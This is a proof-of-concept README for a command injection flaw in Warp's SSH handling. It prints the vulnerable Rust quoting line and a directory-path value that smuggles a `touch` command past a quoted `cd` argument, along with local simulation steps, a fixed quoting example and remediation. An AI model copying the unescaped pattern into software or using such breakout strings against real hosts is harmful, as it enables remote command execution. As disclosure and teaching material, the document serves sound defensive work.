# CVE-2026-48732: Warp Remote SSH cwd Command Injection PoC
## Description
This repository contains a Proof of Concept (PoC) for **CVE-2026-48732**, a high severity OS Command Injection vulnerability in **Warp** legacy SSH background command handling.
Affected Warp versions used the remote working directory (`cwd`) reported by an SSH-backed session when constructing helper commands. Because embedded single quotes in that path were not escaped, an attacker-controlled remote host, repository, or directory name could break out of the quoted `cd` argument and append shell syntax that runs on the remote host as the victim's authenticated SSH account.
**Discovered by: saku0512** ([GitHub](https://github.com/Saku0512))
## Disclaimer
This project is for educational and ethical security testing purposes only.
The author is not responsible for any misuse, damage, or illegal activities caused by this tool. Unauthorized access to computer systems is illegal. By using this software, you agree to use it only in environments where you have explicit permission to conduct security testing.
## Vulnerability Details
- **CVE ID**: CVE-2026-48732
- **GHSA ID**: GHSA-qqpc-wvvw-4269
- **Type**: OS Command Injection (CWE-78)
- **Impact**: Remote Command Execution on the connected SSH host
- **CVSS**: 8.8 High (`CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H`)
- **Affected Versions**:
  - Warp `>= v0.2023.03.21.08.02.stable_00`
- **Fixed Version**:
  - `v0.2026.05.06.15.42.stable_01` or later
## Root Cause
The vulnerable legacy SSH background command path wrapped the remote working directory in single quotes without escaping embedded single quote characters:
```rust
command_str.push_str(&format!("cd '{current_directory_path}' && "));
```
If `current_directory_path` contains a value such as:
```text
/tmp/warp-cve-2026-48732'; touch /tmp/warp_cve_2026_48732_confirmed; echo '
```
the generated shell command becomes:
```bash
cd '/tmp/warp-cve-2026-48732'; touch /tmp/warp_cve_2026_48732_confirmed; echo '' && pwd
```
The injected `touch` command is interpreted by the shell as a separate command.
The patch escapes embedded single quotes before placing the path into the single-quoted shell context.
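The following is an added example, not code from Warp or from this repository's `poc.py`. It places the unescaped builder from above beside a quoted one and decodes the word that `cd` would actually receive in each case. The function names are hypothetical, and the `'\''` idiom is assumed as the escaping form; the exact code of Warp's patch is not reproduced here.

```rust
// Added example, not Warp's code: the unescaped `cd` prefix beside a quoted one.

/// Quote `s` as a single POSIX shell word: wrap it in single quotes and
/// rewrite each embedded `'` as `'\''` (close quote, escaped quote, reopen).
fn sh_single_quote(s: &str) -> String {
    format!("'{}'", s.replace('\'', "'\\''"))
}

/// Pattern from the Root Cause section: the path is pasted in unescaped.
fn build_vulnerable(cwd: &str, helper: &str) -> String {
    format!("cd '{cwd}' && {helper}")
}

/// Same command with the path quoted first.
fn build_hardened(cwd: &str, helper: &str) -> String {
    format!("cd {} && {helper}", sh_single_quote(cwd))
}

/// Decode the word following `cd ` the way a POSIX shell would, handling only
/// single quotes and backslash escapes (enough for the commands built above).
/// Returns the directory argument the shell would actually pass to `cd`.
fn cd_argument(cmd: &str) -> String {
    let mut word = String::new();
    let mut in_quote = false;
    let mut chars = cmd.strip_prefix("cd ").unwrap_or(cmd).chars();
    while let Some(c) = chars.next() {
        match c {
            '\'' => in_quote = !in_quote,          // opens or closes a quoted run
            _ if in_quote => word.push(c),         // everything is literal in quotes
            '\\' => word.extend(chars.next()),     // unquoted backslash escapes one char
            ' ' | ';' | '&' | '|' | '\n' => break, // unquoted: the word ends here
            _ => word.push(c),
        }
    }
    word
}

fn main() {
    // Constructed sample: the path value shown in the Root Cause section.
    let cwd = "/tmp/warp-cve-2026-48732'; touch /tmp/warp_cve_2026_48732_confirmed; echo '";
    for cmd in [build_vulnerable(cwd, "pwd"), build_hardened(cwd, "pwd")] {
        println!("{cmd}\n  cd receives: {}", cd_argument(&cmd));
    }
}
```

With the unescaped builder, the decoded `cd` argument stops at the first embedded quote and the rest of the path is left for the shell to parse as further commands; with the quoted builder, the decoded argument equals the original path byte for byte.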
## Proof of Concept (Usage)
### 1. Environment Setup
Ensure you have Python 3 installed. This PoC simulates the vulnerable command construction locally and does not connect to Warp or SSH.
```bash
python3 --version
```
### 2. Execute Vulnerable Simulation
Run the provided script:
```bash
python3 poc.py
```
Expected output includes a generated vulnerable command and a success message showing that the marker file was created:
```text
[!] SUCCESS: /tmp/warp_cve_2026_48732_confirmed was created.
```
### 3. Verification
Verify that the command was executed successfully by checking for the marker file:
```bash
ls -l /tmp/warp_cve_2026_48732_confirmed
```
If the file exists, the command injection behavior is confirmed in the local simulation.
Clean up the marker file after verification:
```bash
rm -f /tmp/warp_cve_2026_48732_confirmed
```
### 4. Patched Behavior Simulation
Run the fixed command builder:
```bash
python3 poc.py --mode fixed
```
The fixed simulation escapes embedded single quotes, so the marker file should not be created.
## Remediation
Update Warp to a patched release immediately.
The fix escapes embedded single quotes in remote paths before constructing legacy SSH helper commands, preventing attacker-controlled path text from breaking out of the quoted shell argument.
## References
- [GHSA-qqpc-wvvw-4269](https://github.com/warpdotdev/warp/security/advisories/GHSA-qqpc-wvvw-4269)
- [CVE-2026-48732](https://vulners.com/cve/CVE-2026-48732)
- [Warp fixing commit 88c344e2de662a935f0ef0896458494ef2413add](https://github.com/warpdotdev/warp/commit/88c344e2de662a935f0ef0896458494ef2413add)